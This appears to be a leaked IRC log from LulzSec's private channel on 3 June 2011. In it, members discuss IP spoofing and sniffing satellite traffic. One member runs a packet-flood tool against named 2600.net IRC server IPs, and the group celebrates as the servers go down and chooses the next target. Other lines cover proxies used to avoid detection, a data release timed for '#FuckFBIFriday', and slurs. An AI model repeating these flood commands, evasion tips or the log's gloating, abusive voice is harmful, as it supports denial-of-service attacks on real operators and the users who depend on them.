to spoof and make totally imposible to trackJun 03 15:09:23trollpollis satellite based...Jun 03 15:09:36trollpolldid you heard about?Jun 03 15:09:41stormwellJun 03 15:09:49stormi dont know of anything untrackableJun 03 15:09:50trollpollill try to found a doc about itJun 03 15:09:58stormeven my spoofed attacks are trackableJun 03 15:10:02stormif you have backbone accessJun 03 15:10:10stormonly ifJun 03 15:10:13trollpollyes, with a satellite the unique trackable will be that you are in europeJun 03 15:10:18trollpollor in usa xDJun 03 15:10:26stormhehJun 03 15:10:27trollpollbecause the satellite sends the signal to everybodyJun 03 15:10:32trollpollso many ppl can hearJun 03 15:10:51trollpollthe only way to track is in the "send" signalJun 03 15:11:15trollpollbut not in the receive, so, if you spoof your ip address to an ip address that you know that is used by satelliteJun 03 15:11:33trollpollyou can send for one way and receive for anotherJun 03 15:11:52trollpollyou just need an isp that permit spoofingJun 03 15:11:52stormi usually just use random ip spoofingJun 03 15:12:07stormwhich is flag 0 for my programJun 03 15:12:22stormmeaning it sends numerous source ipsJun 03 15:12:28stormmore than 400 id sayJun 03 15:12:47joepie91botflood in #lulzsecJun 03 15:12:51trollpollcoolJun 03 15:13:20stormon 2600?Jun 03 15:13:41stormnvmJun 03 15:14:08RecursionMANJun 03 15:14:15Recursion-capsJun 03 15:14:36Recursionmap, I have more karma on my throwaway account than I do on my regular reddit accountJun 03 15:14:40Recursionman*Jun 03 15:15:32joepie91lolJun 03 15:16:35trollpollbtw the 90% of the satellite traffic is plain text...Jun 03 15:16:50trollpolland is it possible to sniff whatever you want...Jun 03 15:16:59trollpollscada traffic ...Jun 03 15:17:20tflowhttp://lulzsecurity.com/ sailing smoothly againJun 03 15:19:02Topiaryyou think it'll hold captain?Jun 03 15:19:13tflowyesJun 03 15:19:58tflowfor sureJun 03 15:21:13stormdoesnt look smooth to me tflowJun 03 15:21:20tflowhowsoJun 03 15:22:47trollpollanyway, if you want to know more about it... http://www.blackhat.com/presentations/bh-dc-10/Nve_Leonardo/BlackHat-DC-2010-Nve-Playing-with-SAT-1.2-wp.pdfJun 03 15:23:29sabuyesJun 03 15:23:32sabuwe need to look atJun 03 15:23:51stormSabu :DJun 03 15:23:56sabuyes brotherJun 03 15:24:00stormhowyu beJun 03 15:24:23stormim learning nmap &gt;;xJun 03 15:24:24stormerJun 03 15:24:26stormnmap?Jun 03 15:24:26stormnoJun 03 15:24:30stormmsf3Jun 03 15:24:51stormMETASPLOIT NINJA'INJun 03 15:25:02sabuword upJun 03 15:27:41joepie91if you want to know what laws you are breakingJun 03 15:27:42joepie91http://mpictcenter.blogspot.com/2011/06/legal-issues-in-pbs-hack.htmlJun 03 15:27:48joepie91:PJun 03 15:28:00sabusweetJun 03 15:28:02joepie91aaaand gone was anonworldJun 03 15:28:05joepie91&gt;.&lt;Jun 03 15:28:08trollpoll"LulzSec, a splinter group of Anomous,"Jun 03 15:28:11trollpollbad starting...Jun 03 15:28:12joepie91lolyaJun 03 15:28:17joepie91the rest is a copypasteJun 03 15:28:22joepie91from a legalfag emailJun 03 15:31:01stormLULzsecJun 03 15:31:03stormlmaoJun 03 15:32:40lollulzsexJun 03 15:32:55lollulzseckzJun 03 15:35:08stormlolJun 03 15:42:43joepie91there are so many spinoffs on twitterJun 03 15:42:45joepie91and parodiesJun 03 15:42:46joepie91and fansJun 03 15:42:47joepie91etcJun 03 15:44:01tflowit's a meme :oJun 03 15:44:16tflowserver# netstat -n | wc -lJun 03 15:44:16tflow394Jun 03 15:44:21tflowsite is handling a fuckton of visitorsJun 03 15:44:27tflowall those are legitimate connections btwJun 03 15:44:42joepie91lolJun 03 15:44:47joepie91do you have an access log?Jun 03 15:45:38joepie91also, why does the site not have the bitcoin address on itJun 03 15:45:39joepie91:|Jun 03 15:46:26tflowyeah i have an access logJun 03 15:46:32tflowi'll add bitcoin address soonJun 03 15:46:38tflowtoo busy with #fuckfbifriday atmJun 03 15:46:54stormtflowJun 03 15:47:02stormyou backdoor that shit already?Jun 03 15:47:20tflowbackdoor whatJun 03 15:47:37tflow:PJun 03 15:47:38stormi thought that was a server you ownedJun 03 15:47:39stormxDJun 03 15:47:57tflowohJun 03 15:47:59tflowno lolJun 03 15:48:04tflowthat's our lulzsecurity.com serverJun 03 15:48:07joepie91tflow, cat access.log | grep wc -lJun 03 15:48:10joepie91erJun 03 15:48:11stormahJun 03 15:48:16joepie91cat access.log | wc -lJun 03 15:48:18joepie91lefailJun 03 15:48:48tflow12668Jun 03 15:50:16joepie91mmm, not badJun 03 15:50:28joepie91but cloudflare would probably be moar accurateJun 03 15:50:33tflowyeahJun 03 15:50:36tflowthat's in like 10 minsJun 03 15:53:05joepie91what is?Jun 03 15:53:18tflowhow long the site has been up on the next servJun 03 15:53:21tflownew*Jun 03 15:54:25stormi havent been able to load the siteJun 03 15:54:26stormat allJun 03 15:54:34joepie91people really do love lulzsecJun 03 15:54:35joepie91"I can only hope they are charged with Treason. That can still get you the death penelty, if I'm not mistaken."Jun 03 15:55:01sabutrueJun 03 15:55:02joepie91btw, tflow, might want to turn down cloudflare protection level to essentially offJun 03 15:55:05sabutreason for what exactyJun 03 15:55:06sabuahahJun 03 15:55:08joepie91idk?Jun 03 15:55:29tflowyeah i did joepie91Jun 03 15:55:37joepie91okJun 03 15:55:37joepie91alsoJun 03 15:55:38joepie91Seven a.m., waking up in the morning,Jun 03 15:55:38joepie91Gotta get ready, gotta head downstairsJun 03 15:55:38joepie91Gotta have my hacks, gotta have my snacksJun 03 15:55:38joepie91Seein' everything , the time is goin'Jun 03 15:55:38joepie91Tickin' on and on, every's hackin'Jun 03 15:55:38joepie91Gotta get into the databaseJun 03 15:55:38joepie91I hear a smash, I see the fedsJun 03 15:55:38joepie91Kickin' down the front doorJun 03 15:55:38joepie91Smashin' in the back doorJun 03 15:55:38joepie91Gotta make my mind up,Jun 03 15:55:39joepie91How can I escape?Jun 03 15:55:40joepie91It's Friday, FridayJun 03 15:55:41joepie91It's Fuck FBI FridayJun 03 15:55:42joepie91Everybody's lookin' forward to the hackin', hackin'Jun 03 15:55:43joepie91Friday, FridayJun 03 15:55:44joepie91Hackin' it on FridayJun 03 15:55:45joepie91Everybody's lookin' forward to the break inJun 03 15:55:50Topiaryany flood attempts so far tflow?Jun 03 15:55:50tflowlol niceJun 03 15:55:53tflowTopiary, ^Jun 03 15:55:54tflowTopiary, nopeJun 03 15:56:01tflowany flood attempts will be killed by cloudflareJun 03 15:56:09tflowplus the site is running on a dediJun 03 15:56:14tflowso it should be all goodJun 03 15:56:23Topiarythat's awesome joepieJun 03 15:56:26Topiarydid you write that?Jun 03 15:56:36joepie91noesJun 03 15:56:38Topiaryalso hackin' = leakendJun 03 15:56:40joepie91http://www.escapistmagazine.com/forums/read/18.288904-Hacking-Group-LulzSec-gears-up-for-Fuck-FBI-Friday?page=2Jun 03 15:56:43Topiarymust change to leakendJun 03 15:56:52joepie91tflow: http floods get through sometimesJun 03 15:56:57joepie91it takes cloudflare 1 or 2 daysJun 03 15:56:59joepie91to detect the,Jun 03 15:57:00joepie91them*Jun 03 15:57:02joepie91and block themJun 03 15:57:03joepie91&gt;.&gt;Jun 03 15:57:09sabuyea but im a superb adminJun 03 15:57:14joepie91then again, a http flood won't do much if you are running lighttpd/nginxJun 03 15:57:15sabuI'll deter the attacksJun 03 15:57:28stormSabuJun 03 15:57:31sabuhiJun 03 15:57:41stormyou should setup the ircd server to block incoming udp attacksJun 03 15:57:46stormsince irc doesnt need udp at allJun 03 15:57:51joepie91also, it seems Cloudflare is happy with their new customers in anon, lulzsec, etcJun 03 15:57:51joepie91:PJun 03 15:59:00stormlolJun 03 15:59:01TopiaryCloudFlare CEO = our homeboyJun 03 15:59:05TopiaryBitCoin owner = our homeboyJun 03 15:59:08TopiaryPastebin owner = our homeboyJun 03 15:59:13TopiaryMediafire owner = faggotJun 03 15:59:23stormlets pwn mediafireJun 03 15:59:29stormthey sux anywayJun 03 15:59:48joepie91lolJun 03 15:59:51joepie91mediafire removed it?Jun 03 15:59:51joepie91aldoJun 03 15:59:52joepie91also*Jun 03 15:59:54joepie91"bitcoin owner"Jun 03 15:59:55joepie91no existJun 03 15:59:59Topiaryon what?Jun 03 16:00:20Topiaryoh rightJun 03 16:00:33tflowjust @bitcoinmediaJun 03 16:00:36joepie91there is no central owner, remember? :PJun 03 16:07:49joepie91google news frontpage: http://arstechnica.com/tech-policy/news/2011/06/lulz-sony-hackers-deny-responsibility-for-misuse-of-leaked-data.arsJun 03 16:08:22tflowawesome imageJun 03 16:08:26lollol at tht pic xDJun 03 16:08:52lolthts awesome xDJun 03 16:09:05joepie91lol yeJun 03 16:09:10joepie91ars has been posting some great picsJun 03 16:09:12joepie91idk who makes themJun 03 16:09:13joepie91but they are epicJun 03 16:11:11stormglad i dont have a ps3Jun 03 16:13:17joepie91Be proactive about following security best practices and data security compliance requirements. Don't be a Sony.Jun 03 16:13:20joepie91lol'dJun 03 16:13:29joepie91do I smell a new meme?Jun 03 16:13:33joepie91"Don't be a Sony"Jun 03 16:13:37joepie91http://www.pcworld.com/businesscenter/article/229351/sony_hacked_again_how_not_to_do_network_security.htmlJun 03 16:13:39TopiarySony I am disappointJun 03 16:13:56TopiaryPony Slaystation!Jun 03 16:14:03joepie91lolJun 03 16:14:49Topiaryis anyone still on 2600?Jun 03 16:14:52Topiaryif so: disperseJun 03 16:14:54Topiaryfuck that shitholeJun 03 16:15:00Topiaryin our channel anywayJun 03 16:17:03trollpolli think (hope) nobody is still thereJun 03 16:18:19joepie91alsoJun 03 16:18:19joepie91http://www.spiegel.de/netzwelt/web/0,1518,766167,00.htmlJun 03 16:18:23joepie91and well, the channel died out a bitJun 03 16:18:25joepie91after the botfloodJun 03 16:19:08TopiaryI hope none of us are still thereJun 03 16:20:19stormTopiary I agree ;pJun 03 16:20:25stormtheir server got ownedJun 03 16:20:28stormafter we leftJun 03 16:20:45stormcollective was gone as well as every single server i knew ofJun 03 16:20:45storm;xJun 03 16:22:13*	joepie91 is still logged onJun 03 16:22:34stormdo /mapJun 03 16:22:41stormall of the servers are goneJun 03 16:22:42stormlolsJun 03 16:22:54Topiaryyeah none of us should be in #lulzsecJun 03 16:23:06Topiarywe decided to ditch such a filthy room :xJun 03 16:23:08joepie91- collective.2600.net ------------------------------ | Users:   359 (56.2%)Jun 03 16:23:08joepie91-  '- blackbeard.2600.net -------------------------- | Users:     0 (0.0%)Jun 03 16:23:08joepie91-      |- djslocker.2600.net ----------------------- | Users:    92 (14.4%)Jun 03 16:23:08joepie91-      |- bartholomew.2600.net --------------------- | Users:   179 (28.0%)Jun 03 16:23:08joepie91-      '- services.2600.net ------------------------ | Users:     9 (1.4%)Jun 03 16:23:08joepie91- End of /MAPJun 03 16:23:10lolyou've killed all their server xD?Jun 03 16:23:14stormnoJun 03 16:23:18stormoh i seeJun 03 16:23:22stormmadjack isnt linkedJun 03 16:23:25stormweirdJun 03 16:23:33stormi killed their servers hard last nightJun 03 16:23:43stormforgot about it running for like 20 mins just gankingJun 03 16:23:48lolhit collective it has most users xDJun 03 16:23:52stormlololJun 03 16:23:54stormsure thingJun 03 16:23:56storm1 secJun 03 16:25:50stormroot@YNService(~/.local)]#./nsdapx 208.111.35.75 202.103.67.101 6667 0  20 0Jun 03 16:25:51stormSending packets of size 40....Jun 03 16:26:05stormSending packets of size 40....x 208.111.35.75 218.108.235.101 6667 0 20 0Jun 03 16:26:07stormlolzJun 03 16:26:36stormi should hit them with tons of spoofageJun 03 16:26:37stormfromJun 03 16:26:40storm101.101.101.101Jun 03 16:26:43stormlololololJun 03 16:27:09Topiarythey're gonna be so fucking angryJun 03 16:28:48joepie91- Closing Link: s514735fe.adsl.wanadoo.nl (Ping timeout: 240 seconds)Jun 03 16:28:48joepie91~ Connection closedJun 03 16:28:49joepie91interestingJun 03 16:30:20stormlol its their faultJun 03 16:30:29stormfor being fucktwitsJun 03 16:35:06*	pwnsauce (pwnsauce@HA-4fq.4hj.tbgr2g.IP) has joined #pure-eliteJun 03 16:35:11stormpwnsauce :DJun 03 16:35:15pwnsaucehey!Jun 03 16:35:19pwnsauceim a bit fuckedJun 03 16:35:19stormsup cutieJun 03 16:35:22pwnsaucenot muchJun 03 16:35:39stormHACK US, AND WE WILL BOMB YOUJun 03 16:35:48lolThis is the second time hackers have targeted Sony's computer network - in April they stole data from more than 100 million accounts.Jun 03 16:35:49lolonly second?Jun 03 16:36:00lolim sure the score is at like HACKERS 13 SONY 0Jun 03 16:36:14pwnsauceLOLJun 03 16:36:18pwnsaucewe winrarJun 03 16:36:24pwnsauceKayla &lt;3Jun 03 16:38:35storm16:38 -!- djslocker.2600.net ------------------------------- | Users:   145Jun 03 16:38:48storm(34.6%)Jun 03 16:38:48storm16:38 -!-  '- blackbeard.2600.net -------------------------- | Users:     0Jun 03 16:38:48storm(0.0%)Jun 03 16:38:48storm16:38 -!-      |- bartholomew.2600.net --------------------- | Users:   265Jun 03 16:38:48storm(63.2%)Jun 03 16:38:48storm16:38 -!-      '- services.2600.net ------------------------ | Users:     9Jun 03 16:38:48storm(2.1%)Jun 03 16:38:48stormcollective is goneJun 03 16:38:50Topiary&gt;bartholomewJun 03 16:38:53Topiaryhello newcomerJun 03 16:38:59Topiaryshall we pop its DDoS cherry?Jun 03 16:39:12stormi hit it last nightJun 03 16:39:14stormbut yeahJun 03 16:39:15storm:PJun 03 16:40:46pwnsauceheheheheJun 03 16:40:56pwnsauceSYN storm ahead me bretherenJun 03 16:41:16stormlolJun 03 16:41:18stormnot SYNJun 03 16:41:20stormurgJun 03 16:41:21storm!Jun 03 16:41:22storm&lt;#Jun 03 16:41:24storm&lt;3*Jun 03 16:41:27stormurgent ftwJun 03 16:41:35pwnsauceAAAHJun 03 16:41:37pwnsauce:DJun 03 16:41:43stormtheir servers are like URGENT MESSAGE FROM LULZSECJun 03 16:41:44stormdropJun 03 16:41:45stormdropJun 03 16:41:45stormdropJun 03 16:41:51pwnsaucetry PSH alsoJun 03 16:41:52joepie91guysJun 03 16:41:53joepie91http://www.wired.com/threatlevel/2011/06/internet-a-human-rightJun 03 16:41:58stormyeah i use push a lotJun 03 16:42:00pwnsauceInternet IS a right!Jun 03 16:42:04joepie91A United Nations report said Friday that disconnecting people from the internet is a human rights violation and against international law.Jun 03 16:42:07pwnsaucebrb need foodJun 03 16:42:07stormi can hit with any tcp flagJun 03 16:42:08storm;pJun 03 16:42:10pwnsauce:DJun 03 16:45:28*	tflow has quit (A TLS packet with unexpected length was received.)Jun 03 16:45:53*	tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-eliteJun 03 16:50:56storm16:50 -!- collective.2600.net ------------------------------ | Users:   190Jun 03 16:50:56storm(44.8%)Jun 03 16:50:56storm16:50 -!-  '- blackbeard.2600.net -------------------------- | Users:     0Jun 03 16:50:56storm(0.0%)Jun 03 16:50:56storm16:50 -!-      |- djslocker.2600.net ----------------------- | Users:   225Jun 03 16:50:56storm(53.1%)Jun 03 16:50:56storm16:50 -!-      '- services.2600.net ------------------------ | Users:     9Jun 03 16:50:56storm(2.1%)Jun 03 16:50:59stormgoneJun 03 16:51:37TopiaryamazingJun 03 16:51:40Topiaryfucking 2600Jun 03 16:52:05Topiaryyou're like our resident sniper sitting in the crow's nest with a goddamn deck-shattering electricity blastJun 03 16:52:25Topiaryenemy ships being riddled with holesJun 03 16:52:26stormRPF:Jun 03 16:52:27stormROFLJun 03 16:52:35stormwowJun 03 16:52:38stormyou're epicJun 03 16:52:47joepie91lolJun 03 16:52:49joepie91TopiryaJun 03 16:52:52joepie91Topiary *Jun 03 16:52:55joepie91write a fucking bookJun 03 16:52:58joepie91I'm seriousJun 03 16:52:58storm^Jun 03 16:52:58joepie91lolJun 03 16:53:02stormyeah dude loflJun 03 16:53:38storm700 seconds to completely down that server. on both of themJun 03 16:53:45sabulol\Jun 03 16:53:49stormthats with 200mbps thoughJun 03 16:54:04stormmy gigabit was so ownage before i lost itJun 03 16:54:06storm:( RIPJun 03 16:54:16Topiaryyou guys have to just picture ourselves as an awesome boat crew, and storm is just chilling in that nest with a mounted rail gun scorching the living fuck out of incoming fleetsJun 03 16:54:17stormshit downed servers in 200secondsJun 03 16:54:33stormroflJun 03 16:54:53joepie91TopiaryJun 03 16:54:56joepie91why is lulzsec not trending yetJun 03 16:54:57joepie91on twitterJun 03 16:55:02Topiary:( because we lameJun 03 16:55:07stormtrending howJun 03 16:55:08trollpolllolJun 03 16:55:16Topiarytwitter trending is riggedJun 03 16:55:27*	tflow has quit (Ping timeout: 121 seconds)Jun 03 16:55:28storm@LulzSec Im in irc.2600.net and everyone is dropping like flies. Also, did you see those threats by @AnonymousNLJun 03 16:55:36*	tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-eliteJun 03 16:55:38stormuh ohJun 03 16:55:38trollpollthe twitter algorithm is not for a long term topic...Jun 03 16:55:40stormTHREATZ?Jun 03 16:56:01Topiarythe twitter trend system is based on mainstream "forgot what I was talking about yesterday" ADHD logicJun 03 16:56:13trollpollyepJun 03 16:56:17Topiaryjust like 20-minute TV episodesJun 03 16:56:22trollpollso, create a new hashtagJun 03 16:56:31Topiary#FuckFBIFridayJun 03 16:56:32trollpollif you wanna be tt..Jun 03 16:56:32Topiaryis our currentJun 03 16:56:38trollpolllolJun 03 16:56:46stormit's funny though TopiaryJun 03 16:56:47stormcause likeJun 03 16:56:52stormif you read 2600's shitJun 03 16:56:58stormits like they're sucking upJun 03 16:57:19Topiarywe should just tell them we'll DDoS them until they forbid Jester to chill thereJun 03 16:57:21stormbut yet they took our channels registeryJun 03 16:57:38stormnot even that, i'm more pissed about the channel being taken overJun 03 16:57:41stormthats bunk as hellJun 03 16:57:48stormadmins dont do that lame shitJun 03 16:58:14stormuh ohJun 03 16:58:19stormi think i nulled their serverJun 03 16:58:41Topiarypity, looks like they lost another frigateJun 03 16:58:54joepie91loolJun 03 16:58:56stormi really did bust its null cherry i guessJun 03 16:59:01stormcause i didnt null it last nightJun 03 16:59:10Topiaryit capsizedJun 03 16:59:17Topiarynot getting drained for at least 7 minutesJun 03 16:59:24Topiarythen more flood?Jun 03 16:59:27stormsureJun 03 16:59:35stormdjslocker.2600.net nextJun 03 16:59:39*	tflow has quit (Ping timeout: 121 seconds)Jun 03 16:59:55*	tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-eliteJun 03 17:00:32sabuhttp://www.youtube.com/watch?v=u6LgIWr47LQ = hhahhahahha watch them get on the black guyJun 03 17:01:02joepie91is Awinee SERIOUSLY still tweeting to you guys?Jun 03 17:01:07joepie91he sad he is getting ignored?Jun 03 17:01:19sabuyeah hes gayJun 03 17:01:20sabu..win 2Jun 03 17:01:35joepie91Quote #1171: "joepie91they could make the Regulatory Agency of E-Porn (RAEP) and I would care less" (added by Spoonzy at 01:37 AM, April 02, 2011)Jun 03 17:01:40joepie91effexor \o/Jun 03 17:04:08stormits back up nowJun 03 17:04:10stormand rofl sabuJun 03 17:04:21stormthis videos funnyJun 03 17:08:05joepie91stormJun 03 17:08:09joepie91where is collective hosted?Jun 03 17:08:28stormHost Virtual, Inc VR-208-111-35-0-24 (NET-208-111-35-0-1) 208.111.35.0 - 208.111.35.255Jun 03 17:08:43stormVR HOSTED VRHOS-ARIN-19-0002 (NET-208-111-32-0-1) 208.111.32.0 - 208.111.47.255Jun 03 17:10:25*	Topiary has changed the topic to: pE | Research and exploit development | Coding, designing, penetrating, packeting, laughing at our crippled opponentsJun 03 17:10:34joepie91@MrEGrizzlyJun 03 17:10:34joepie91Mr. E GrizzlyJun 03 17:10:34joepie91@LulzSec 504 error on WWW.lulzsecurity.comJun 03 17:10:34joepie913 minutes ago via Twitter for AndroidJun 03 17:10:45*	lol has quit (A TLS packet with unexpected length was received.)Jun 03 17:10:48Topiarynope it's up joepieJun 03 17:10:54stormits not up for meJun 03 17:10:58stormhasnt beenJun 03 17:11:05TopiaryI guess it's still down in a few areasJun 03 17:11:32joepie91give me a secJun 03 17:11:34joepie91I think...Jun 03 17:11:37joepie91we are getting too much trafficJun 03 17:11:37joepie91lolJun 03 17:11:56pwnsauceFFSJun 03 17:12:07*	lol (parr0t@HA-i98.11n.cc0br2.IP) has joined #pure-eliteJun 03 17:12:20joepie91ohwaitJun 03 17:12:21joepie91that was 503Jun 03 17:12:27joepie91504 is just a cloudflare borkJun 03 17:12:38joepie91ED had the issue with too much trafficJun 03 17:12:42joepie91ED was too big for cloudflare o_OJun 03 17:12:58joepie91as in, there were errors because there were so many requests a second, the servers couldn't handle itJun 03 17:13:03Topiaryapparently we're handling 50-100 legit requests a secondJun 03 17:16:45joepie91ye, it's not capacity faillJun 03 17:16:48joepie91fail*Jun 03 17:16:49*	tflow has quit (A TLS packet with unexpected length was received.)Jun 03 17:16:52joepie91there seem to be issues with cloudflareJun 03 17:16:58joepie91someone else gets connection refusedJun 03 17:17:05joepie91so I suppose cloudflare has to fix their shitJun 03 17:17:20joepie91with anonnews, ED, and lulzsec... they've probably been handling a bit more traffic lately :DJun 03 17:18:25pwnsaucetrue datJun 03 17:19:43*	tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-eliteJun 03 17:31:03stormhmmJun 03 17:31:10stormlooks like others are taking after usJun 03 17:31:14stormand ddosing collectiveJun 03 17:31:16stormcause im notJun 03 17:31:25storm[17:31] [+sillygooth(+i)] [2:collective/#2600(+lmnt)] [Lag: 32 (??)]Jun 03 17:31:57stormtheir ddos is slow thoughJun 03 17:39:19sabuyeahJun 03 17:39:25sabuthats some laermJun 03 17:39:26sabulamerJun 03 17:39:31stormlolJun 03 17:39:33stormisnt me!Jun 03 17:40:08joepie91anyone feels like playing age of empires 2Jun 03 17:40:12joepie91in multiplayerJun 03 17:40:15joepie91with me and a friend?Jun 03 17:40:19stormaoe sucksJun 03 17:40:19stormwellJun 03 17:40:22stormi suck at aoeJun 03 17:40:26joepie91lolJun 03 17:40:44stormi play another multiplayer game from the 90'sJun 03 17:40:54joepie91no but srslyJun 03 17:41:00joepie91we are trying to get a 2v2 goingJun 03 17:41:03joepie91but missing player ;_;Jun 03 17:41:03storm2d overhead capture the flag/strategic gameJun 03 17:41:04stormxDJun 03 17:41:11Topiarystorm: you ever play on the Dreamcast?Jun 03 17:41:19stormyeah when i was a kidJun 03 17:41:25TopiaryI still have oneJun 03 17:41:29stormhahaJun 03 17:43:01*	trollpoll has quit (Quit: Leaving)Jun 03 17:44:36sabuyo stormsexJun 03 17:44:43sabudont waste no more resources on 2600Jun 03 17:44:45sabusave your boxesJun 03 17:44:50sabuwe'll have another targetJun 03 17:45:53stormokJun 03 17:45:57stormwill do broskiJun 03 17:45:59storm:)Jun 03 17:46:09stormrebooting to go play that game in the aforementionedJun 03 17:46:14stormafk guizJun 03 17:46:15sabukkJun 03 17:46:18sabuthx broJun 03 17:46:18pwnsaucekkJun 03 17:46:21storm&lt;3 sabuJun 03 17:46:25stormlatersJun 03 17:46:29*	storm detachedJun 03 18:31:53*	lol has quit (A TLS packet with unexpected length was received.)Jun 03 18:31:55*	lol (parr0t@HA-bdi.9ck.dqsjqe.IP) has joined #pure-eliteJun 03 18:37:35*	pwnsauce has quit (Ping timeout: 121 seconds)Jun 03 18:44:27*	lol has quit (A TLS packet with unexpected length was received.)Jun 03 18:44:35*	lol (lol@HA-s5h.ho4.fu85s5.IP) has joined #pure-eliteJun 03 18:58:59*	Palladium (Palladium@HA-kd2.1lr.tbgr2g.IP) has joined #pure-eliteJun 03 18:59:47&lt;palladium&gt;	HiJun 03 19:02:04lolhi :DJun 03 19:17:46*	Palladium has quit (Quit: Lost terminal)Jun 03 19:24:01sabuhiJun 03 19:25:48[redacted]hiJun 03 19:26:47*	Palladium (Palladium@HA-kd2.1lr.tbgr2g.IP) has joined #pure-eliteJun 03 19:26:54&lt;palladium&gt;	HiJun 03 19:28:34sabuhiJun 03 19:28:38sabuwhat up nigglesJun 03 19:29:50[redacted]can i haz opJun 03 19:30:28[redacted]joepie91- I love AoE 2 :DJun 03 19:30:31*	Sabu gives channel operator status to [redacted]Jun 03 19:30:33*	Sabu gives channel operator status to PalladiumJun 03 19:30:45*	Sabu gives channel operator status to tflowJun 03 19:30:46*	Sabu gives channel operator status to lolJun 03 19:40:20*	joepie91 has quit (Ping timeout: 121 seconds)Jun 03 19:47:34*	Palladium has quit (Quit: Lost terminal)Jun 03 19:54:52*	joepie91 (joepie91@HA-u3g.pbq.j3hiks.IP) has joined #pure-eliteJun 03 19:57:18joepie91well fuckJun 03 19:57:22joepie91AoE crashed my entire pcJun 03 19:57:23joepie91:|Jun 03 19:57:31joepie91did I miss anything?Jun 03 19:59:11tflownoJun 03 19:59:13tflowyou're in timeJun 03 19:59:17tflowfor fuckfbiJun 03 19:59:22tflowgoing to release in a few minsJun 03 19:59:32tflowbut we can't upload it to tpb because tpb upload is borkedJun 03 19:59:43tflowso we just have to do a plain .torrent fileJun 03 19:59:50tflow:&lt;Jun 03 20:00:11joepie91ohJun 03 20:00:17joepie91let me log on frm lapyJun 03 20:00:19joepie91lappy*Jun 03 20:00:24joepie91on what domain can I reach this server/Jun 03 20:00:26joepie91derpJun 03 20:00:28joepie91?*Jun 03 20:00:41joepie91hanging over keyboard typing sideways =/= successJun 03 20:01:31tflowthis irc?Jun 03 20:01:35tflowthere's no domain afaikJun 03 20:03:44joepie91wellJun 03 20:03:45joepie91derpJun 03 20:03:54joepie91let me manually type the ip then :PJun 03 20:05:06*	tflow has quit (A TLS packet with unexpected length was received.)Jun 03 20:05:27*	tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-eliteJun 03 20:06:05*	joepie92 (joepie91@HA-u3g.pbq.j3hiks.IP) has joined #pure-eliteJun 03 20:06:11*	joepie92 is now known as joepie91_laptopJun 03 20:06:12joepie91_laptopohaitharJun 03 20:06:26joepie91_laptoplulz from bed :DJun 03 20:06:55tflowsameJun 03 20:17:01joepie91_laptophttp://postimage.org/image/2nzrr8f44Jun 03 20:17:28tflowthat's pretty oldJun 03 20:20:23joepie91_laptopb14ck4dd3r == SanguineRose?Jun 03 20:20:31joepie91_laptopwriting style somewhat matchesJun 03 20:20:40joepie91_laptopand yes I know it's old, just hadn';t seen the picture before :PJun 03 20:22:00joepie91_laptopalsoJun 03 20:22:15joepie91_laptopapparently lulzsec has inspired people to use both cloudflare and bitcoinJun 03 20:22:35joepie91_laptopTopiary: for added win, get Cloudflare to accept Bitcoins for their Pro packageJun 03 20:28:56joepie91_laptop@attritionorgJun 03 20:28:56joepie91_laptopattrition.orgJun 03 20:28:56joepie91_laptop@securitygen does @CloudFlare still fail to protect a site if you attack it using IP instead of DNS name?Jun 03 20:29:00*	joepie91_laptop facepalmsJun 03 20:29:23*	Neuron (Neuron@HA-t6n.62t.o0m95d.IP) has joined #pure-eliteJun 03 20:29:28neurono/ hey gusyJun 03 20:30:03sabuhi sexypieJun 03 20:30:41neuronhey baby want a good time?Jun 03 20:30:44*	Neuron shakes assJun 03 20:31:11joepie91_laptopNeuronJun 03 20:31:12joepie91_laptophaiJun 03 20:31:14sabudoing new lelak nowJun 03 20:31:19neuronwhats the leak?Jun 03 20:31:27neuroni logged on :P im not sure what FuckFBIFriday isJun 03 20:31:32joepie91_laptopNeuron, can you pm the non-cinfu socks to joepie91 (my desktop) again?Jun 03 20:31:35joepie91_laptopI might need it :PJun 03 20:31:47neuronjoepie91_laptop: i no longer have a non cinfu socks i canceled it :PJun 03 20:31:51joepie91_laptopohJun 03 20:31:53joepie91_laptop:|Jun 03 20:31:56neuronall mine are cinfu :(Jun 03 20:32:01neuronill work on getting moreJun 03 20:32:05joepie91_laptopwhere did you register them fromJun 03 20:32:06joepie91_laptopthe cinfusJun 03 20:32:06neuronSabu: we in 2600?Jun 03 20:32:12joepie91_laptopbecause I got caught by maxmind today &gt;.&gt;Jun 03 20:32:15sabuhttp://infragardatlanta.org/Jun 03 20:32:18sabuno. neuron.Jun 03 20:32:21sabustay away from thereJun 03 20:32:40neuronSabu: was just asking. If we were i was just gonna work on socialingJun 03 20:33:06tflowcheck twitter feedJun 03 20:33:08neuronjoepie91_laptop: you have to register from the same place your ip isJun 03 20:33:10tflowwe just releasedJun 03 20:33:11tflow:&gt;Jun 03 20:33:29joepie91_laptopI knowJun 03 20:33:30joepie91_laptopI didJun 03 20:33:35joepie91_laptopgot busted for open proxy &gt;.&gt;Jun 03 20:33:39neuronlmfaoJun 03 20:33:46neuronsend me 1bc and ill order one for youJun 03 20:33:49joepie91_laptopso I need something non-publicJun 03 20:33:50joepie91_laptopahJun 03 20:33:52joepie91_laptopthats ok tooJun 03 20:33:59joepie91_laptoplemme get out of bedJun 03 20:34:10neuronrgrJun 03 20:34:12neuronwhos tflow ?Jun 03 20:34:38tflowi've been here since the start of lulzsec, just not in this chanJun 03 20:35:44neuronahh i see.. hi o/ im neuron the local keyboard cowboy *i code*Jun 03 20:36:36joepie91Neuron, check your pm for a sec so I can get back into bedJun 03 20:36:38joepie91it's coldJun 03 20:36:39joepie91:PJun 03 20:36:43tflowahJun 03 20:36:43tflowniceJun 03 20:36:48neuronjoepie91: check it :PJun 03 20:37:55*	joepie91_laptop back into bedJun 03 20:38:47neuronSabu: what servers did you end up buying?Jun 03 20:39:27sabuhold on neuronJun 03 20:39:28sabuhop on twitterJun 03 20:39:31sabuwatch it exposeJun 03 20:39:33sabuexplodeJun 03 20:39:50neuronwatchingJun 03 20:40:20joepie91_laptoptwitter is raping my laptop :(Jun 03 20:40:56neuronits not so much raping me :/Jun 03 20:41:07neuronim searching fbi hackedJun 03 20:41:22joepie91_laptopguysJun 03 20:41:23joepie91_laptoppleaseJun 03 20:41:27joepie91_laptopstop using spaces in filenamesJun 03 20:41:40neuronjoepie.... file\ spaceJun 03 